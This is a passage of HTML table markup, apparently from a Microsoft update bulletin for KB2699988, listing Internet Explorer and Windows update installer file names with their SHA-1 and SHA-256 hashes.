class=\"sbody-td\">8653DEF834DC28CB1B329CED1310D01F0247FEA71BA1AB94AC32ABAFC85B13C4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-deu.exe</td><td class=\"sbody-td\">5AD34FEF0D2C5E654EB3D6F82BDD280FC45A6F07</td><td class=\"sbody-td\">5F5E29DD1D21DB01D6AFC0ED5145E6072C4194757D2D4E09F916856EFC489D47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-esn.exe</td><td class=\"sbody-td\">EDAED3C394945A8DF6E10B242D21BA32239118E8</td><td class=\"sbody-td\">FD74A6C482F5212064E6110CD7CD551C6571EFF8BB9D79C796DFBDE18ACBC24A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-rus.exe</td><td class=\"sbody-td\">E0DCD4BE0FFF4EFCA99DB6ADC44628ECE39FA34D</td><td class=\"sbody-td\">D240ABC5547E06B31F20D05251B91C250CAEDFE516A145AEC8093B497B883EE2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-cht.exe</td><td class=\"sbody-td\">3BC88A1260723F1F0C209B974AF658BB9D79EF9D</td><td class=\"sbody-td\">12C15434D3CA0EE8470CF555D8552C6911C398550519B47807F6445B9858D595</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-chs.exe</td><td class=\"sbody-td\">CC1C44D836B3A15A1956D2205C9C2578071D1FCF</td><td class=\"sbody-td\">BEEBC6DD1224CBD12BE4A73913843C4238230D6304599BF9D43D89AA5165B7EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-ita.exe</td><td class=\"sbody-td\">974C4A2F54136A475567C40F0F684443D2BF580D</td><td class=\"sbody-td\">CED5DB368461BAE1AD9847C75A78B2433618B37FE0D9D9F6264CD2F9F4F3C743</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-kor.exe</td><td class=\"sbody-td\">7AD0EBA699293346BAB941039106564F8BBAB56F</td><td class=\"sbody-td\">2AD67406E693D37C371C90BC52E8366E9B236F1803D54D46B4F36E664E53D41F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-enu.exe</td><td class=\"sbody-td\">5439BA7C52F41037933ADD77D0E31A4FBF2D3822</td><td class=\"sbody-td\">B18DD013FC18980FEB3B8E4B15F3110FABF49AE131E1CBB326472A0B39E5DA4A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-jpn.exe</td><td class=\"sbody-td\">F91190A7DDC0531B655D853E8E0E99004CF2CE1A</td><td class=\"sbody-td\">4970F2751812E0630967A83D994BC032F3FAAAFB160D39066FE796E4101283EA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-fra.exe</td><td class=\"sbody-td\">BF065F6B9B51B77E4FEF9BCC7B5A35F3503D10D0</td><td class=\"sbody-td\">E308E747860F32F54EE27C4E4E7F815B5D4F10E3FDFDD522367285921C8F0006</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-ptb.exe</td><td class=\"sbody-td\">B3A3B01E928556054772BDEDF8063CE2AEB93855</td><td class=\"sbody-td\">2C9BC8CCEAE2701B66BDC44817487E1B2ED905F16775D77633A66807ED7F33BA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">13F7596C84BF670D60899F2BFB35D70F05E0A455</td><td class=\"sbody-td\">BCBA4EB440BA927C6C4F720F1E72F764A80EE852FBE9F7408B02E65874A3A849</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">CE1F3BE52044FA452D280974DB8EC882194608DB</td><td class=\"sbody-td\">9C2FAAB8AE48FA227A4610D329CE6B6412FBC33B1FB46603C9F2EAE615DDA277</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">022C01255EE447DC8BE60340B92C8E377DC98853</td><td class=\"sbody-td\">0C7B8A40EA8E232EAE2EA3D4C02DAD958369B78F2F67DD08336EA9B9DC277024</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">CDB1CD79DC73E8D01D2224608A078226155DE24A</td><td class=\"sbody-td\">29F6065AC9371AA96A49AD35EEA06FFC89FF770CEF6BD5A08996ABDE0FF040F2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">B8E0E423B30D465EE158B6349A078281D9BC450C</td><td class=\"sbody-td\">DF7DDAECAEE84E39F119FB8B0E3785179F344285FC7E0AE249662A9AE8079399</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">892351AE6CCC131B871594E756B750394E4CB31C</td><td class=\"sbody-td\">5EA1D3FE5226B8AE22A9FCAB3DA7C7BF3579BE785EC0161A203C908ACFA6972B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">363D06E868BCAFB0F7D9A20621D93D5E9DB11DFD</td><td class=\"sbody-td\">5B72C49DA9845A0AB9C6C660ACCFD3944A2D2231C5277AE85B5C1E011AC48051</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">2EBF5A591631CDA8D903C7A777E225C4D9D2A43D</td><td class=\"sbody-td\">E3C5F8ADA5852273DD53BFF1B7C21A645C26FE2F7436803A4569D3E5C5BD24C9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">713C56ED3A072A617A538532AD39E1E8CB6678A8</td><td class=\"sbody-td\">DF4A593960D29D1EE20696C73B1E72E0E717679B25CA4DE02181D3713DA4D541</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">81BE80A10277177FE4F3487E92906F8AA81D7AC2</td><td class=\"sbody-td\">B65CA0340C846863E88E493DF9F88540CB82016B2AA43B9555F1C418DF0DE5D7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">92C023E0B30D5E95FAE3B7C716598C3F886A66C5</td><td class=\"sbody-td\">FDD734CF4E87C9A92B350A35955B9999FE45EBF658E58F865A8B763BA8A1F07A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">41F71CF7DFAD46396DAB99BE8A92D76B3BFCD526</td><td class=\"sbody-td\">3B87CC03BD142E54C13F995C7343886798228F7D3053097CB211E1008CBDEC81</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">FC47B501926263E1DB4B448E173F751FD599F4B2</td><td class=\"sbody-td\">C54FB2D9B2FC0C1BA4BDF840E9B400D130692DA37C9044BFB99EC27D970DC5E3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">3776561E2520FAD7090ED5B8DB470FA4C3B5DF82</td><td class=\"sbody-td\">3A25E0A1BF6C2B334696C38F8758F386BF4CE4534A3A4DB09FB489B82272A717</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">BCB7C5FC4FBAD5821801F17569CF19A99D981950</td><td class=\"sbody-td\">C0B21D753DC6E541E55CD5AE77E904A67FCCB1020E3B55C8F9CFB3870E1E6CA7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">114319A4920BF07A3D4F6B377DE4D34D4BFC36FC</td><td class=\"sbody-td\">5C34EFF1D3AAC2861327EE08829960DD59DF50864AB89F72D32B2B63130693EC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-enu.exe</td><td class=\"sbody-td\">37BF6B94B5717FC27C264A3A6D2925D38C7B00CB</td><td class=\"sbody-td\">B92BB6D9F9D41F9843EFB4A7AF8067100F98C5F81A446D7CEC370A4F02BEAC7D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-csy.exe</td><td class=\"sbody-td\">0B3E9B63CEA006705FF2E76C971750B5950B8473</td><td class=\"sbody-td\">9A04372C3049D337DE864953C61469B4F5442C94725071BADA5FDCADD5B1D63A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-dan.exe</td><td class=\"sbody-td\">D617FE6600B6987F7B4529BB08619CC0CBD9A881</td><td class=\"sbody-td\">F615C546565DC695FBC4012067039B878EF9773D61C12C15C0CE22295764D152</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-fin.exe</td><td class=\"sbody-td\">D1B4FDD35B0B7268E6CF71FB8F1F0D5F0FC928CC</td><td class=\"sbody-td\">7C9507D8ACAD13198C36685A33ADAB27BDF2A52B54FE29E91692E7A08FA6E36D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-nld.exe</td><td class=\"sbody-td\">0EB3B7ECBC965E68EBED417995F2CAF0EF60BBAB</td><td class=\"sbody-td\">3EA01E2FDFA879BFEEBEF55DEA905A439D5031151C3D00CF8237AB166CFB80E2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-heb.exe</td><td class=\"sbody-td\">F05F5DEB2AEDA0693B0F54B04ACD724D4E5858CC</td><td class=\"sbody-td\">092FDF7238EAED170768E29342C4666A4B5DA63A79F4A860BFE6AFAA7ECB10A2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ptb.exe</td><td class=\"sbody-td\">B89E033A05B1B276659AF08339A2639126917059</td><td class=\"sbody-td\">CA0B250BACC45006E81A9D797A0A75E2DAF58D36C11A0082103717C356A40A44</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-sve.exe</td><td class=\"sbody-td\">990FAC7E7B8B6BBAD2B71C86796D08F3941F8AFE</td><td class=\"sbody-td\">3B117F63F67DE5F94D363F75F479B6CB51E11D933C0BAEB826C8E6BB60DEDD02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-nor.exe</td><td class=\"sbody-td\">776FDD3599BE07D1803A55DD34960CA3312B4C3A</td><td class=\"sbody-td\">E23138CEC571877B91952A23FD352259D4BA378400C693B06D128D1B32AB7811</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-esn.exe</td><td class=\"sbody-td\">B2037A19F2319B5D5C1F1FC7B44A073D6B6B9CBC</td><td class=\"sbody-td\">F594F08355A5F2CBBCA6FE898CF7F4632FC69D875CC0688F047A1EA33F653233</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-rus.exe</td><td class=\"sbody-td\">7CA2B440829750044DCC41058FDFA9F9EE194D6A</td><td class=\"sbody-td\">0C468C88EF3306CF2B9D9B59A88594B8F390D70E833B54CAC8D0E5862422F662</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-chs.exe</td><td class=\"sbody-td\">B73B6C5C39CF8699152DBA43E66252F915784CAE</td><td class=\"sbody-td\">D0C3F66E04761FB7133FE7E0B09F9D0E487109E9AEF3E8E1ED34614474321D1B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ell.exe</td><td class=\"sbody-td\">31C5426B7CEB54525BB38F81CEDA39CC3C204A75</td><td class=\"sbody-td\">D75A254D15524C47E8354AF7A5C34AA0170A6C0017D938B6D089226F13123386</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ptg.exe</td><td class=\"sbody-td\">B9CC37983CC37B5132AEE1ADF9F16DBA73F09EC2</td><td class=\"sbody-td\">67EC3E4DD2DABB11E970580013BF4B8F94239FEF0D7D68C1D5044679F49762C9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-kor.exe</td><td class=\"sbody-td\">5FE1D21C80B35EC677DAAE6A4A305624551100DB</td><td class=\"sbody-td\">A68E09F4186706CC3F7455008CEC48B3EFCA9DAE78391DDC39C22DCD0BDCBC0A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-trk.exe</td><td class=\"sbody-td\">2B1ED70B291D8F04F002384015EC02D5F70D1CC7</td><td class=\"sbody-td\">320B64857687ACF3AAAC47B499EA401B4CDEA179918AD876C47B0D1CC2D5B440</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-jpn.exe</td><td class=\"sbody-td\">F1127E0A55D14DBAF720BA6E0232DD8D21750633</td><td class=\"sbody-td\">70A812DE2FA438B4573FF1DCCFE9E9F5C7B6857DF5A3314415A56AB76071F709</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ita.exe</td><td class=\"sbody-td\">7C5E13285247BAA521D4378E90B321EB937F9DDC</td><td class=\"sbody-td\">15B17995D2C2730D8C77B8212B55E7A4011FAA3D3050251DBB964BEDF5F61872</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-fra.exe</td><td class=\"sbody-td\">74A903B9C7FD88E04253CDF90B3B7E64AAC95538</td><td class=\"sbody-td\">84F44D1287EC7FB79946930D2F57CC30A84B621041A2C15A4C18DD11E8717B5B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">2396DD3C9709515D323A6A44068A305E5EC6C903</td><td class=\"sbody-td\">EF238010DA1B6506156CD53A78CB56CEB7F45D56E10BF18A80CFFE8CC2FD8C5B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">71EA345B4C2CE76EDFDDAB0A4FA997851D17D912</td><td class=\"sbody-td\">EF45C563AD16E80501FAA74965A3243E6D402E69CB66DC784FA9FAEEE9DA2103</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">9D75245CF72C1A3B58215AB1E67A671B1B8ED599</td><td class=\"sbody-td\">C8628577DBF8E734735020D143D6628ED038B1A398499ECBD032634B08779365</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">7CD990D067B049C7E759D267128FE391D7C56153</td><td class=\"sbody-td\">7067985EE455E4918A1BB8A5A05041709C69567D1EDB81EF8B1C5EB8FD77FA8E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">6AF6F0836E82C9B49603D7C4DFB558D9812521DF</td><td class=\"sbody-td\">F6D346AF76593CAAEA366565F4E2C73C70E3F4C13D571EBF62FC7D91463544FD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-deu.exe</td><td class=\"sbody-td\">A07152D2384F3C927E2F004AD60609F362B152CC</td><td class=\"sbody-td\">6B43358A64DAD4443F9F2A99E7E6196862504F00D3F50852F9479FA4353853E2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-cht.exe</td><td class=\"sbody-td\">36A6E4F3E77A2F0CBBD4EB56332F3437E35ABAD6</td><td class=\"sbody-td\">314ED06BCA772C28DB45F4242A12A0879EE04068EF2661DB07884464D394AAC0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-enu.exe</td><td class=\"sbody-td\">C781F86FB6CDB7A38C70FCB36EB496812AAAFB36</td><td class=\"sbody-td\">916C3BE4E7FED7397E658D425D00A4436D81B69F2F552F03EC42AC750B6CB619</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-jpn.exe</td><td class=\"sbody-td\">680F5B978A9FE583E12358885700AB90B52E718B</td><td class=\"sbody-td\">15EB52836E07BD39842F59F63EEAE84C728DE24E572C27E2018C8B083FCE382E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">90F162A98D9FA5AF70B21A79216B8AC9AC18AC02</td><td class=\"sbody-td\">DB206FDF459DB0F02903A41388A578401A3E59EF9204BE4AC51B3808B1278557</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-ia64-jpn.exe</td><td class=\"sbody-td\">044D96A548A7955777280B4AE6127EB688D2AAE6</td><td class=\"sbody-td\">54905D038CAC48EF0EC4454154809A12EDD7C98776B6718D533C843CCC25F85A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.1-kb2699988-x64.msu</td><td class=\"sbody-td\">EF4438C952B2EF46C90AD963097E94C6C7C1397E</td><td class=\"sbody-td\">A17B4D1BC6EE60684A98B7A93C6FBC87EE7AAA6691E7610498AAF516E6E7409B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">C366FA06288B975FF43661D2BD2B68589DDA3C4B</td><td class=\"sbody-td\">CE8859FB6AD173F1DE957B756D3FD9DB19A556A1BF1C536FA59C0E6A86B38A97</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.1-kb2699988-x64.msu</td><td class=\"sbody-td\">5E9BD26B8D993D64CD0EE8B352E4207305ABCEDB</td><td class=\"sbody-td\">06DDA505893EEBA66592CCB0CDA819FC09468540B79DE5661309BE4280913766</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">66EE6EA480E4126D2AE7BDB22C859B0DA86F8197</td><td class=\"sbody-td\">C5D2B28E604456CD0CC7ADC90D493844EE171754116B8D61A8844AC01DE5C03C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">58763032E00AB7569060059908CBE87F3BB15F79</td><td class=\"sbody-td\">1CEB696BB948A50D000BF7FE64B8F450EDC7A567F09B489896B403B7FAE3A8B2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">32E33B7CB074F07A708C1909E2624B5D4DB5B9DB</td><td class=\"sbody-td\">C8F736140C4D13EAC05750CF2C547BE99435B9258A873B9E991C3F4C571FF3DA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">163E6E6CE4ED4F188DA8AD01B322E8CD01890730</td><td class=\"sbody-td\">C93CD88822D018E33A6DB19A38DE02621F81F6EAE84D8FA87C0AD1C2C1640035</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">675E8EA8BE7553CD9B356B45A3E95A9A5A5D923E</td><td class=\"sbody-td\">1195EF4BC93807345132B68411EB528E3A3EF9808724A733E24A89F6AF116CF7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">7A113713B6A45E6F9FCC34110FC3B33FFFB85383</td><td class=\"sbody-td\">C8BF8FBFAD188CB4EA95DABC1C101CDF09410762B278F2005CC2B05201C9BE1E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">19E54BDD358FBBE4BD6A295D0E0BA4A93823261F</td><td class=\"sbody-td\">415CA80DFFE01EEDF2DEEFA1267E521D35FFD43C58068875F519FF84945ACA57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">3DB7E2951BF981EA504AF81D931689605CF902C4</td><td class=\"sbody-td\">FC24D5CFB71ADAD51E9FA0C03369D35F4988CE7D177AA53EC93161A3F7B9FB16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">0809AFCF5DD5AD4F798FE5B4509ADCB0402FA44D</td><td class=\"sbody-td\">42BF87A8D9F36DF245E9E1A4292847F961225037E91F48099ED447DD49946AFF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">368FD918F0FD71D650187920AFFD527733C0DB49</td><td class=\"sbody-td\">410FCC4E76B0737B8EC93BFA8D024D41969BA1F884DC60B3621AF3DCF3F0EE86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">4C755DCFD9542690CE30FA1C1968D335E1C9A75C</td><td class=\"sbody-td\">8EFEDFF8B8F3FBD171420A3E41D293A3CD87B317E5B06DF8E4887F2720634F9F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-deu.exe</td><td class=\"sbody-td\">AEA53C4D6A02093F9D5D651682B3CB579780B71D</td><td class=\"sbody-td\">11D4D77DA11D9623FA3907943FAD97E2C12DE4A29EB57E2F8C62A860A3FC526A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-ptb.exe</td><td class=\"sbody-td\">C5DE9289C0AAEB011F70734C0F9DFF2D4FE7F1A2</td><td class=\"sbody-td\">DE0F0602E3721E42867A41A4091302780E3724B2A3014B4BD215651CC90610AC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-fra.exe</td><td class=\"sbody-td\">028C6234805DC697C74AC87BF5E190BCFCC9DBBB</td><td class=\"sbody-td\">F542CBAD554C4AD231DE6EF0210DF7B9B5F00974A32F1C33F81240C1932544EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-cht.exe</td><td class=\"sbody-td\">8B4E63BA4900116D2227F88183FF494BC06E9D45</td><td class=\"sbody-td\">4090137752AD08F62916E2A6FA7C9E661FDB3537C14F785194B89AFC0FCB2334</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-esn.exe</td><td class=\"sbody-td\">107D9F72134E1FF575FAE9ED16B60B36647C25EB</td><td class=\"sbody-td\">4A1046C48D29A513334BE91B76D690E9718B9E2DE1CD16D65DB0B2E25046B608</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-rus.exe</td><td class=\"sbody-td\">6F2B39C9AF06A72E724241A719D06857BBFBAA8D</td><td class=\"sbody-td\">9A44D9A71188C5E4271EF8EEB14122BA6A425E99133738230F749CA960D4B48B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-chs.exe</td><td class=\"sbody-td\">B0D54D1DA00ACB42FB3C0FF81B8048B2BCD50AF4</td><td class=\"sbody-td\">F904BDD9E1269B6618D78261F932FA9B4266DA74D8D35AC936944529BF4087A9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-kor.exe</td><td class=\"sbody-td\">BB9E3614A4A3E572F080469259B00C4B18876A91</td><td class=\"sbody-td\">0554173C3BA7F0B9B283DDB97491A5A005DA07939D5CB8596867CEA3BDE55C09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003.windowsxp-kb2699988-x64-ita.exe</td><td class=\"sbody-td\">E980F6D8C67C815CB4A13F90FE9B95236C155D44</td><td class=\"sbody-td\">6725573CAE445A150E98817ADA75396AD5A87A932B8BF0F50E4A8FD50E41F7D0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-enu.exe</td><td class=\"sbody-td\">0184DDB117FBA7995BA952CBC13474CBF7960913</td><td class=\"sbody-td\">370A76B4AF1EDE8DFC7DEFF22FFF27A7D506A789F2E92FC98CB6F4A02F54BD9B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-deu.exe</td><td class=\"sbody-td\">0FFB1E1F646FCD08168CA53FDE9FAD82F9870610</td><td class=\"sbody-td\">949C1CF4F4B7569BC58C62764295A1E3F0962C6DA0CD336BA1199B7F66AB5B26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-jpn.exe</td><td class=\"sbody-td\">E2D113A096E2EA9B8A743179CD2FD2FACF273C2B</td><td class=\"sbody-td\">E8BB0EB8F73DFA7B3A84A9869CBE69B9ECC942F4CB3BDB1EE26C99D1F4C26116</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-ia64-fra.exe</td><td class=\"sbody-td\">F30CC7836C069322A5FB6FB044A0A44BE20B8209</td><td class=\"sbody-td\">A9FD42F7BBEC37C75172473795CC0B7D1A3A2946BE67689D69EEC31FD537E303</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">FF645B69FB06C8A18709B9840E0C7B0608BCFE04</td><td class=\"sbody-td\">223B5749BECBCADA6E4B4B6F39B5CEFF3F5D8429468077CC1DA219E27ED88573</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ara.exe</td><td class=\"sbody-td\">B48AD2EA8AD544ADF1B769560B66D9C6681E03C1</td><td class=\"sbody-td\">EC1486C6E6F6B8F00C98AD584D5DA73B485E9362B6BC123667AB8992E26E25BF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">F6042848D82ABD64A02446964EE7C665E7994A7B</td><td class=\"sbody-td\">B208D9E76562EFB04AD93B1C215AE72BE7A0D195F79579F6D3601AF09E2CA766</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">7583ED693D1938572073EE8393BD9330A6DC2B8A</td><td class=\"sbody-td\">49E1BF303EFB221E531300A4EF32A42533DEFC7B03FE89144FEE6AD8494A8603</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">6A880E2D1AEEBDDC921BBF97EC61CF3670A52CC0</td><td class=\"sbody-td\">A88C6B635C475BE0377FAC5E02E94A2035075E8DBED4A01DDBF568C5A97F58A2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">5ED4D92C574800D725817E29E70676BFD890E959</td><td class=\"sbody-td\">7DBD1B8F44A620533EFAB48A7088BA71BB5A6FFCE084C15E950BA085F95376EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.1-kb2699988-x86.msu</td><td class=\"sbody-td\">EFBD38FFFCBD41D42565FBB2B5C81A7C6D481702</td><td class=\"sbody-td\">941F302F5A001E8B3FF8C30D6432B52F904DC35144EB7A01BD2D6B6BB6D50F05</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-hun.exe</td><td class=\"sbody-td\">69FE2E4BDAB981ABEC1835920574F4232333A60C</td><td class=\"sbody-td\">1B6E95EB67518AB0A29E42C9CA865DB35F7D8AE928594002E39EE3DBCCB62D2D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-plk.exe</td><td class=\"sbody-td\">880BAA435CC75F813ED336F2A2CD79A47EE816DC</td><td 